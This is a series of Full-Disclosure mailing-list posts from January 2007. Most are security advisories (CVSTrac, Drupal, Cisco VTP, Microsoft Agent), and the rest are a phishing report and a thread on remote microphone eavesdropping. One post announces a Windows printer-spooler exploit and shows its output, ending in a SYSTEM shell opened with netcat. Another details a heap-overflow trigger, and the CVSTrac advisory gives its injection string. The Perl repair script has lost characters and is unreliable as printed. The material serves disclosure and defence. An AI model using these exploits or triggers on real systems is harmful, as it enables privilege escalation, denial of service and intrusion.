[Full-disclosure] CVSTrac 2.0.0 Denial of Service (DoS) vulnerability
SECURITY ADVISORY
=
Application:CVSTrac
Version:2.0.0
Vulnerability: Denial of Service (DoS)
Identification: CVE-2007-0347
Date: 2007-01-29 12:00 UTC
DESCRIPTION
---
A Denial of Service (DoS) vulnerability exists in CVSTrac
(http://www.cvstrac.org/) version 2.0.0, a web-based bug and patch-set
tracking system for the version control systems CVS, Subversion and Git.
The vulnerability is in the Wiki-style text output formatter and is
triggered by special text constructs in commit messages, tickets and
Wiki pages. Only users with check-in permissions and Wiki or ticket edit
permissions can perform an attack. But as the anonymous user usually
is granted Wiki edit and ticket creation permissions, an attacker
remotely and anonymously can cause a partial DoS (depending on the pages
requested) on a CVSTrac installation by opening a new ticket or editing
a Wiki page with an arbitrary text containing for instance the string
/foo/bar'quux.
The result of an attack is an error of the underlying SQLite RDBMS:
| Database Error
| db_exists: Database exists query failed
| SELECT filename FROM filechng WHERE filename='foo/bar'quux'
| Reason: near quux: syntax error
ANALYSIS
The DoS vulnerability exists because the is_eow() function in format.c
does NOT just check the first(!) character of the supplied string
for an End-Of-Word terminating character, but instead iterates over
string and this way can skip a single embedded quotation mark. The
is_repository_file() function then in turn assumes that the filename
string can never contain a single quotation mark and traps into an SQL
escaping problem.
An SQL injection via this technique is somewhat limited as is_eow()
bails on whitespace. So while one _can_ do an SQL injection, one is
limited to SQL queries containing only characters which get past the
function isspace(3). This effectively limits attacks to SQL commands
like VACUUM.
WORKAROUND
--
Administrators can quickly workaround by revoking permissions on the
users. Restoring those permissions, obviously, would require keeping
vulnerable permissions on at least one infrequently used account like
setup or using the CLI sqlite3(1) to manually add them back later.
One can resurrect an attacked CVSTrac 2.0.0 by fixing the texts in the
underlying SQLite database with the following small Perl script.
##
## cvstrack-resurrect.pl -- CVSTrac Post-Attack Database Resurrection
## Copyright (c) 2007 Ralf S. Engelschall [EMAIL PROTECTED]
##
use DBI; # requires OpenPKG perl-dbi
use DBD::SQLite; # requires OpenPKG perl-dbi, perl-dbi::with_dbd_sqlite=yes
use DBIx::Simple; # requires OpenPKG perl-dbix
use Date::Format; # requires OpenPKG perl-time
my $db_file = $ARGV[0];
my $db = DBIx::Simple-connect(
dbi:SQLite:dbname=$db_file, , ,
{ RaiseError = 0, AutoCommit = 0 }
);
my $eow = q{\x00\s.,:;?!)'};
sub fixup {
my ($data) = @_;
if ($$data =~ m:/[^$eow]*/[^$eow]*'[^$eow]+:s) {
$$data =~ s:(/[^$eow]*/[^$eow]*)('[^$eow]+):$1 $2:sg;
return 1;
}
return 0;
}
foreach my $rec ($db-query(SELECT name, invtime, text FROM wiki)-hashes()) {
if (fixup(\$rec-{text})) {
printf(++ adjusting Wiki page \%s\ as of %s\n,
$rec-{name}, time2str(%Y-%m-%d %H:%M:%S, -$rec-{invtime}));
$db-query(UPDATE wiki SET text = ? WHERE name = ? AND invtime = ?,
$rec-{text}, $rec-{name}, $rec-{invtime});
}
}
foreach my $rec ($db-query(SELECT tn, description, remarks FROM
ticket)-hashes()) {
if (fixup(\$rec-{description}) or fixup(\$rec-{remarks})) {
printf(++ adjusting ticket #%d\n,
$rec-{tn});
$db-query(UPDATE ticket SET description = ?, remarks = ? WHERE tn =
?,
$rec-{description}, $rec-{remarks}, $rec-{tn});
}
}
foreach my $rec ($db-query(SELECT tn, chngtime, oldval, newval FROM
tktchng)-hashes()) {
if (fixup(\$rec-{oldval}) or fixup(\$rec-{newval})) {
printf(++ adjusting ticket [%d] change as of %s\n,
$rec-{tn}, time2str(%Y-%m-%d %H:%M:%S, $rec-{chngtime}));
$db-query(UPDATE tktchng SET oldval = ?, newval = ? WHERE tn = ? AND
chngtime = ?,
$rec-{oldval}, $rec-{newval}, $rec-{tn},
$rec-{chngtime});
}
}
foreach my $rec ($db-query(SELECT cn, message FROM chng)-hashes()) {
if (fixup(\$rec-{message})) {
printf(++ adjusting change [%d]\n,
$rec-{cn});
$db-query(UPDATE chng SET message = ? WHERE cn = ?,
$rec-{message}, $rec-{cn});
}
}
$db-commit();
$db-disconnect();
RESOLUTION
--
Upgrade to the now available CVSTrac 2.0.1:
http://www.cvstrac.org/cvstrac-2.0.1.tar.gz
Or apply the following upstream vendor patch against CVSTrac 2.0.0:
http://www.cvstrac.org/cvstrac/chngview?cn=852
Index: cvstrac/format.c
--- format.c2006/07/05 01:06:50 1.87
+++ format.c2006/08/16 23:02:14 1.88
@@ -77,6 +77,8 @@
** Return TRUE if *z points
[Full-disclosure] [OpenPKG-SA-2007.008] OpenPKG Security Advisory (cvstrac)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public):OpenPKG-SA-2007.008 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.008 Advisory Published: 2007-01-29 14:02 UTC Issue Id (internal): OpenPKG-SI-20070117.01 Issue First Created: 2007-01-17 Issue Last Modified: 2007-01-29 Issue Revision: 08 Subject Name:cvstrac Subject Summary: VCS web frontend Subject Home:http://www.cvstrac.org/ Subject Versions:* = 2.0.0 Vulnerability Id:CVE-2007-0347 Vulnerability Scope: global (not OpenPKG specific) Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service Description: Ralf S. Engelschall from OpenPKG GmbH discovered a Denial of Service (DoS) vulnerability in the CVS/Subversion/Git Version Control System (VCS) frontend CVSTrac [0], version 2.0.0. The vulnerability is in the Wiki-style text output formatter and is triggered by special text constructs in commit messages, tickets and Wiki pages. Only users with check-in permissions and Wiki or ticket edit permissions can perform an attack. But as the anonymous user usually is granted Wiki edit and ticket creation permissions, an attacker remotely and anonymously can cause a partial DoS (depending on the pages requested) on a CVSTrac installation by opening a new ticket or editing a Wiki page with an arbitrary text containing for instance the string /foo/bar'quux. The DoS vulnerability exists because the is_eow() function in format.c does NOT just check the FIRST character of the supplied string for an End-Of-Word terminating character, but instead iterates over string and this way can skip a single embedded quotation mark. The is_repository_file() function then in turn assumes that the filename string can never contain a single quotation mark and traps into an SQL escaping problem. An SQL injection via this technique is somewhat limited as is_eow() bails on whitespace. So while one _can_ do an SQL injection, one is limited to SQL queries containing only characters which get past the function isspace(3). This effectively limits attacks to SQL commands like VACUUM. Administrators can quickly workaround by revoking permissions on the users. Restoring those permissions, obviously, would require keeping vulnerable permissions on at least one infrequently used account like setup or using the CLI sqlite3(1) to manually add them back later. References: [0] http://www.cvstrac.org/ Primary Package Name:cvstrac Primary Package Home:http://openpkg.org/go/package/cvstrac Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLIDcvstrac-2.0.0-E1.0.2 For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document. -BEGIN PGP SIGNATURE- Comment: OpenPKG GmbH http://openpkg.com/ iD8DBQFFvfCEZwQuyWG3rjQRApMLAJ0Q/mkpIIar3VjFoMVay7b70i5DIwCfX8lJ 6ITu0bSW6c3RR9sQ6q6cIpQ= =kxz6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle - Indirect Privilege Escalation and Defeating Virtual Private Databases
Hey all, For anyone that's interested I've just put out two papers (chapters really); one on Indirect Privilege Escalation in Oracle and the other on Defeating Virtual Private Databases in Oracle. You can grab them here. http://www.databasesecurity.com/dbsec/ohh-indirect-privilege-escalation.pdf http://www.databasesecurity.com/dbsec/ohh-defeating-vpd.pdf Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Phishing Evolution Report Released
Hello List(s), For those interested in the original FD email about a new phishing technique being employed on a professional networking site (late last week), the investigation and subsequent report have been published. Readers of 'The Register' will note a write up already in place with some feedback from the site involved. Although the claim of 10 or so reports per month of similar scams being made are probable, I doubt that many (if any) have taken as much detailed involvement from the scammer before the phish is set. http://www.theregister.co.uk/2007/01/29/ecademy_419_scam/ You can find the report at the following address: http://www.beskerming.com/marketing/reports/index.html Or, for the direct link: http://www.beskerming.com/marketing/reports/ Beskerming_Phishing_Report_Jan_07.pdf A higher detailed version is available upon request, which includes sufficient detail in the account screenshots for the profile text to be legible. An Executive Summary for those who don't want to read the report: - Yes, it was a scam. The scammer started out with a stolen identity, maintaining it all the way through the scam (even when confronted) - Ultimately it was a 419-style phish / scam that was traced back to Nigeria - The first recorded use of the particular stolen identity was November 06, with a very similar scam (though a more traditional mass spam email). - The scammer invested at least 2-3 days of communication and trust- building before beginning to seed the phish / scam - The initial round of the phish bait was mild enough to almost be missed. - The Networking site was VERY prompt in addressing the situation once notified (less than 5 minutes to remove the account when it reappeared and they were notified again). Props to Ecademy in this case. - Sometimes you just need to be paranoid. Any questions or queries, just ask them. Carl Sûnnet Beskerming Pty. Ltd. Adelaide, Australia http://www.beskerming.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Universal printer provider exploit for Windows
We have developed a new exploit that should allow code execution as SYSTEM with the following software: - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED NOTFIXED -0day!!! - Citrix Metaframe - cpprov.dll - FIXED - Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback) More information at : http://www.514.es/2007/01/universal_exploit_for_vulnerab.html (spanish) exploit code: http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip /* Title: Universal exploit for vulnerable printer providers (spooler service). Vulnerability: Insecure EnumPrintersW() calls Author: Andres Tarasco Acuña - [EMAIL PROTECTED] Website: http://www.514.es This code should allow to gain SYSTEM privileges with the following software: blink !blink! blink! - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED NOTFIXED -0day!!! - Citrix Metaframe - cpprov.dll - FIXED - Novell (nwspool.dll - CVE-2006-5854 - untested) - More undisclosed stuff =) If this code crashes your spooler service (spoolsv.exe) check your vulnerable printer providers at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers Workaround: Trust only default printer providers Internet Print Provider and LanMan Print Services and delete the other ones. And remember, if it doesnt work for you, tweak it yourself. Do not ask D:\Programación\EnumPrinters\Exploitstestlpc.exe [+] Citrix Presentation Server - EnumPrinterW() Universal exploit [+] Exploit coded by Andres Tarasco - [EMAIL PROTECTED] [+] Connecting to spooler LCP port \RPC Control\spoolss [+] Trying to locate valid address (1 tries) [+] Mapped memory. Client address: 0x003d [+] Mapped memory. Server address: 0x00a7 [+] Targeting return address to : 0x00A700A7 [+] Writting to shared memory... [+] Written 0x1000 bytes [+] Exploiting vulnerability [+] Exploit complete. Now Connect to 127.0.0.1:51477 D:\Programación\EnumPrintersnc localhost 51477 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32whoami NT AUTHORITY\SYSTEM regards, Andres Tarasco ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [DRUPAL-SA-2007-005] Drupal 4.7.6 / 5.1 fixes arbitrary code execution issue
Drupal security advisory DRUPAL-SA-2007-005 Project: Drupal core Version: 4.7.x, 5.x Date: 2007-Jan-29 Security risk:Highy critical Exploitable from: Remote Vulnerability:Arbitrary code execution Description --- Previews on comments were not passed through normal form validation routines, enabling users with the 'post comments' permission and access to more than one input filter to execute arbitrary code. By default, anonymous and authenticated users have access to only one input format. Immediate workarounds include: disabling the comment module, revoking the 'post comments' permission for all users or limiting access to one input format. Versions affected - - Drupal 4.7.x versions before Drupal 4.7.6 - Drupal 5.x versions before Drupal 5.1 Solution - If you are running Drupal 4.7.x then upgrade to Drupal 4.7.6. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.7.6.tar.gz - If you are running Drupal 5.x then upgrade to Drupal 5.1. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-5.1.tar.gz - To patch Drupal 4.7.5 use http://drupal.org/files/sa-2007-005/SA-2007-005-4.7.5.patch. - To patch Drupal 5.0 use http://drupal.org/files/sa-2007-005/SA-2007-005-5.0.patch. Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 4.7.6 or 5.1. Reported by --- The Drupal security team. Contact --- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. // Uwe Hermann, on behalf of the Drupal Security Team. -- http://www.hermann-uwe.de | http://www.holsham-traders.de http://www.crazy-hacks.org | http://www.unmaintained-free-software.org signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PC/Laptop microphones
I started this discussion elsewhere, but I feel that there is more experience and concern here. When I look at BIOS settings I see config options to disable sound cards, USB, CDROM, INTs, etc., but what about the PC or laptop microphone? Does disabling the sound card remove the availability of a built-in microphone? What if I want to play mp3s but never have the need to use a microphone? Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), what prevents my OS provider (or distribution) and ISP from working on a way to listen in on my office or home conversations via the microphone or the built-in speakers? Thoughts? -Jim P. signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p -- Tyop? Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
Jim, In all reality you don't have to be an agent to do this. You could just write an exploit that when successfully executed would compromise the target and then fetch an application from a remote site. I'm sure that things like this have been done in the past. Hell imagine what you could do with a web cam! ;] New telephones are no different I'm sure. On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote: I started this discussion elsewhere, but I feel that there is more experience and concern here. When I look at BIOS settings I see config options to disable sound cards, USB, CDROM, INTs, etc., but what about the PC or laptop microphone? Does disabling the sound card remove the availability of a built-in microphone? What if I want to play mp3s but never have the need to use a microphone? Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), what prevents my OS provider (or distribution) and ISP from working on a way to listen in on my office or home conversations via the microphone or the built-in speakers? Thoughts? -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
This was discussed in the past. It is one of the features within Core Impact from Core Security. Here is an old post on the subject: CORE IMPACT has a Python module (uses win32api)to do just that, it is called Record audio file (there is also a play audio file and a grab 1 frame from Webcam) Basically, it uses the Windows MCI interface: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/multimed/ht m/_win32_about_mci.asp http://msdn.microsoft.com/library/default.asp?url=/library/en-us/multimed/ht m/_win32_mci_reference.asp There is also a generic Execute MCI string that we commonly use to amuse ourselves by opening/closing the CD door remotely once we've gain access to a target system running windows. It should not be difficult to write your own quickly with Python and the above reference from the MSDN -Original Message- From: Simon Smith [mailto:[EMAIL PROTECTED] Sent: Monday, January 29, 2007 10:02 PM To: Jim Popovitch; Untitled Subject: Re: [Full-disclosure] PC/Laptop microphones Jim, In all reality you don't have to be an agent to do this. You could just write an exploit that when successfully executed would compromise the target and then fetch an application from a remote site. I'm sure that things like this have been done in the past. Hell imagine what you could do with a web cam! ;] New telephones are no different I'm sure. On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote: I started this discussion elsewhere, but I feel that there is more experience and concern here. When I look at BIOS settings I see config options to disable sound cards, USB, CDROM, INTs, etc., but what about the PC or laptop microphone? Does disabling the sound card remove the availability of a built-in microphone? What if I want to play mp3s but never have the need to use a microphone? Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), what prevents my OS provider (or distribution) and ISP from working on a way to listen in on my office or home conversations via the microphone or the built-in speakers? Thoughts? -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] S21sec-034-en: Cisco VTP DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello - Cisco has posted a Security Response in reference to this issue at the following URL: http://www.cisco.com/warp/public/707/cisco-sr-20070129-vtp.shtml Cisco Response == An issue has been reported to the Cisco PSIRT involving malformed VLAN Trunking Protocol (VTP) packets. This attack may cause the target device to reload, causing a Denial of Service (DoS). Such an attack must be executed on a local ethernet segment, and the VTP domain name must be known to the attacker. Additionally, these attacks must be executed against a switch port that is configured for trunking. Non-trunk access ports are not affected. This issue is tracked as Cisco Bug ID CSCsa67294. Details === The VLAN Trunking Protocol (VTP) is a Layer 2 protocol that manages the addition, deletion, and renaming of VLANS on a network-wide basis in order to maintain VLAN configuration consistency. VTP packets are exchanged by VLAN-aware switches. For more information on VTP, consult the following link: http://www.cisco.com/en/US/products/hw/switches/ps663/products_configuration_guide_chapter09186a00800e47e3.html. Upon receiving a malformed VTP packet, certain devices may reload. The attack could be executed repeatedly causing a extended Denial of Service. In order to successfully exploit this vulnerability, the attacker must know the VTP domain name, as well as send the malformed VTP packet to a port on the switch configured for trunking. This does not affect switch ports that are configured for voice vlans. A complete Inter-Switch Link (ISL) or 802.1q trunk port is required for the device to be vulnerable. These platforms are affected: * Cisco 2900XL Series Switches * Cisco 2950 Series Switches * Cisco 2955 Series Switches * Cisco 3500XL Series Switches * Cisco 3550 Series Switches * Cisco 3570 Series Switches No other Cisco products are known to be vulnerable to this issue. This issue was made public on 26-Jan-2007 on the Full-Disclosure and Bugtraq mailing lists. The Cisco bug ID CSCsa67294 was made available to registered customers in May of 2005. We would like to thank David Barroso Berrueta and Alfredo Andres Omella for reporting this vulnerability to us. You can find their release here: http://www.s21sec.com/es/avisos/s21sec-034-en.txt. We greatly appreciate the opportunity to work with researchers on security vulnerabilities and welcome the opportunity to review and assist in security vulnerability reports against Cisco products. Workarounds === In order to mitigate your exposure, ensure that only known, trusted devices are connected to ports configured for ISL or 802.1q trunking. More information on securing L2 networks can be found in the Cisco SAFE Layer 2 Security document at this location: http://www.cisco.com/en/US/netsol/ns340/ns394/ns171/ns128/networking_solutions_white_paper09186a008014870f.shtml Additional Information == THIS DOCUMENT IS PROVIDED ON AN AS IS BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. Revision History +--+--++ | Revision 1.0 | 2007-January-29 | Initial public release | +--+--++ Cisco Security Procedures = Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. On Fri, Jan 26, 2007 at 02:46:43PM -0500, S21sec Labs wrote: ### ID: S21SEC-034-en Title: Cisco VTP Denial Of Service Date: 26/01/2007 Status: Vendor contacted, bug fixed Severity: Medium - DoS - remote from the local subnet Scope: Cisco Catalyst Switch denial of service Platforms: IOS Author: Alfredo Andres Omella, David Barroso Berrueta Location: http://www.s21sec.com/es/avisos/s21sec-034-en.txt Release: Public ### S 2 1 S E C http://www.s21sec.com Cisco VTP Denial Of Service About VTP - VTP (VLAN Trunking Protocol) is a Cisco proprietary protocol used for VLAN centralized management. For instance, when you configure a VLAN in a switch, the VLAN
Re: [Full-disclosure] PC/Laptop microphones
On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote: On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] S21sec-034-en: Cisco VTP DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello - Cisco's response follows for this issue: Cisco Response == An issue has been reported to the Cisco PSIRT involving malformed VLAN Trunking Protocol (VTP) packets. This attack may cause the target device to reload, causing a Denial of Service (DoS). Such an attack must be executed on a local ethernet segment, and the VTP domain name must be known to the attacker. Additionally, these attacks must be executed against a switch port that is configured for trunking. Non-trunk access ports are not affected. This issue is tracked as Cisco Bug ID CSCsa67294. Details === The VLAN Trunking Protocol (VTP) is a Layer 2 protocol that manages the addition, deletion, and renaming of VLANS on a network-wide basis in order to maintain VLAN configuration consistency. VTP packets are exchanged by VLAN-aware switches. For more information on VTP, consult the following link: http://www.cisco.com/en/US/products/hw/switches/ps663/products_configuration_guide_chapter09186a00800e47e3.html. Upon receiving a malformed VTP packet, certain devices may reload. The attack could be executed repeatedly causing a extended Denial of Service. In order to successfully exploit this vulnerability, the attacker must know the VTP domain name, as well as send the malformed VTP packet to a port on the switch configured for trunking. This does not affect switch ports that are configured for voice vlans. A complete Inter-Switch Link (ISL) or 802.1q trunk port is required for the device to be vulnerable. These platforms are affected: * Cisco 2900XL Series Switches * Cisco 2950 Series Switches * Cisco 2955 Series Switches * Cisco 3500XL Series Switches * Cisco 3550 Series Switches * Cisco 3570 Series Switches No other Cisco products are known to be vulnerable to this issue. This issue was made public on 26-Jan-2007 on the Full-Disclosure and Bugtraq mailing lists. The Cisco bug ID CSCsa67294 was made available to registered customers in May of 2005. We would like to thank David Barroso Berrueta and Alfredo Andres Omella for reporting this vulnerability to us. You can find their release here: http://www.s21sec.com/es/avisos/s21sec-034-en.txt. We greatly appreciate the opportunity to work with researchers on security vulnerabilities and welcome the opportunity to review and assist in security vulnerability reports against Cisco products. Workarounds === In order to mitigate your exposure, ensure that only known, trusted devices are connected to ports configured for ISL or 802.1q trunking. More information on securing L2 networks can be found in the Cisco SAFE Layer 2 Security document at this location: http://www.cisco.com/en/US/netsol/ns340/ns394/ns171/ns128/networking_solutions_white_paper09186a008014870f.shtml Additional Information == THIS DOCUMENT IS PROVIDED ON AN AS IS BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. Revision History +--+-++ | Revision 1.0 | 2007-January-29 | Initial public release | +--+-++ Cisco Security Procedures = Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. On Fri, Jan 26, 2007 at 02:46:43PM -0500, S21sec Labs wrote: ### ID: S21SEC-034-en Title: Cisco VTP Denial Of Service Date: 26/01/2007 Status: Vendor contacted, bug fixed Severity: Medium - DoS - remote from the local subnet Scope: Cisco Catalyst Switch denial of service Platforms: IOS Author: Alfredo Andres Omella, David Barroso Berrueta Location: http://www.s21sec.com/es/avisos/s21sec-034-en.txt Release: Public ### S 2 1 S E C http://www.s21sec.com Cisco VTP Denial Of Service About VTP - VTP (VLAN Trunking Protocol) is a Cisco proprietary protocol used for VLAN centralized management. For instance, when you configure a VLAN in a switch, the VLAN information (the VLAN name and its identifier) will be configured automatically in all the switches that belong to the
[Full-disclosure] COSEINC Alert: Microsoft Agent Heap Overflow Vulnerability Technical Details (Patched)
Microsoft Agent Heap Overflow Vulnerability
COSEINC Alert
http://www.coseinc.com/alert.html
Vendor:
Microsoft
Systems Affected:
Windows 2000 All Service Packs
Windows XP All Service Packs
Overview:
Microsoft Agent is a software technology that enables an enriched form of
user interaction that makes learning to use a computer easier. With the
software service, developers can enhance the user interface of their
applications and Web pages with interactive personalities in the form of
animated characters.
This feature is preinstalled on Win2k/XP and allows loading of remote
character data via HTTP through Internet Explorer. Microsoft actually
utilizes a custom compression algorithm to compress the character data file
(.acf) which we presume is to speed up the distribution over network.
A security researcher of COSEINC Vulnerability Research Lab has discovered
that Microsoft Agent has a heap overflow vulnerability. This vulnerability
is triggered when Microsoft Agent parses the malformed character file in its
uncompressed state in memory, by having an overly large value in a length
field. This will lead to an integer overflow during the allocation of
buffer. Subsequently, when data is copied to the buffer, the heap overflow
will occur. The result is possible remote code execution.
Technical Details:
The vulnerability exists in the ReadWideString function in agentdpv.dll:
711a2cc4 mov eax,[ebp+0xc]
711a2cc7 cmp eax,ebx
711a2cc9 jz agentdpv!ReadWideStringW+0x6b (711a2d0e)
711a2ccb lea eax,[eax+eax+0x2]
711a2ccf pusheax
711a2cd0 callagentdpv!operator new (711aaa6c)
The .acf format when uncompressed in memory, stores strings with their
lengths prepended to them. To trigger the vulnerability, a large value
7FFF can be set in the length field of a string before compression takes
place to create a malformed .acf file (This can be done using the Microsoft-
supplied Agent Character Editor and editing the memory contents when
creating the .acf file). When Microsoft Agent parses the .acf file, this
length is read after uncompressing the file in memory:
711a2cc4 mov eax,[ebp+0xc] ; length of string
An integer overflow occurs presumably during the calculation of the size of
the memory to allocate for a widestring using the supplied length, resulting
in an allocation of 0 bytes:
711a2ccb lea eax,[eax+eax+0x2]
711a2ccf pusheax
711a2cd0 callagentdpv!operator new (711aaa6c)
Sometime after, the string will be read from memory allocated earlier and
copied to the buffer leading to the overflow and corrupting the heap.
711a2ce8 pushebx
711a2ce9 add edx,edx
711a2ceb pushedx
711a2cec pusheax
711a2ced pushedi
711a2cee calldword ptr [ecx+0xc]{ole32!CMemStm::Read (771e7a1f)}
Notes:
The string has been earlier written (together with other data) to a
temporary buffer as a result of the uncompressing procedure. The 2nd DWORD
in the .acf file specifies the total size of the file in its uncompressed
state and is used internally to allocate the required memory for the
temporary buffer.
The number of bytes to copy from this temporary buffer is apparently
determined by subtracting from the total size, the size of previous data
chunks and does not utilize the supplied string length.
Hence, the amount of overflow can be controlled by simply using a string of
the desired length. This is why the large length of 7FFF does not result
in continuous copying leading to access violation (usually in the case of an
integer overflow). Consequently, an arbitrary 4-byte overwrite will occur
resulting in possible code execution.
Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/ms06-068.mspx
Credit:
This vulnerability was discovered by Willow, a Windows security researcher
of the COSEINC Vulnerability Research Lab (VRL).
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
no warranties, implied or express, with regard to this information. In no
event shall the author or the company be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or spread of
